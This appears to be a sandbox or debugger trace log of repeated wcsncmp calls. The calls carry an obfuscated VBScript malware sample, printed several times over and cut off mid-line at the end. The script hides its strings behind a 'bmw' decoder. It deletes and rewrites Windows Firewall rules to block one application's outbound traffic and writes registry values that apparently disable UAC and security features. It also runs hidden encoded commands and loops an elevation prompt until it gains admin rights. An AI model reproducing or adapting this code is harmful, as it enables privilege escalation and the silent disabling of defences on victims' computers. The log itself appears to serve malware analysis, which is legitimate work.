bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -26 [0226.317] wcsncmp (_String1="\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0226.317] wcsncmp (_String1="\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -26 [0226.318] wcsncmp (_String1="\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0226.318] wcsncmp (_String1="\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -26 [0226.318] wcsncmp (_String1="\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = 